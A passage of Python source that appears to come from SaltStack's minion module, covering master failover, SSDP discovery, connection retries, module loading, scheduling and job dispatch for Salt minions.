if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
return
mapping = self.opts['discovery'].get('mapping', {})
discovered = []
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
if self.opts['discovery'].get('multimaster'):
discovered.append(proto_data['master'])
else:
self.opts['master'] = proto_data['master']
return
self.opts['master'] = discovered
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# run ssdp discovery if necessary
self._discover_masters()
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _check_minions(self):
'''
Check the size of self.minions and raise an error if it's empty
'''
if not self.minions:
err = ('Minion unable to successfully connect to '
'a Salt Master. Exiting.')
log.error(err)
raise SaltSystemExit(code=42, msg=err)
def _spawn_minions(self, timeout=60):
'''
Spawn all the coroutines which will sign in to masters
'''
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters. If match is 'any' we let
# eval_master handle the discovery instead so disconnections can also handle
# discovery
if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'):
self._discover_masters()
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self._connect_minion(minion)
self.io_loop.call_later(timeout, self._check_minions)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
minion.opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
self.minions.append(minion)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
except SaltMasterUnresolvableError:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(minion.opts['master'])
log.error(err)
break
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
opt_in = True
if not opts:
opts = self.opts
opt_in = False
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(opts, proxy=proxy)
if opts.get('multimaster', False):
s_opts = copy.deepcopy(opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(opts, functions, proxy=proxy)
if opt_in:
self.opts = opts
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
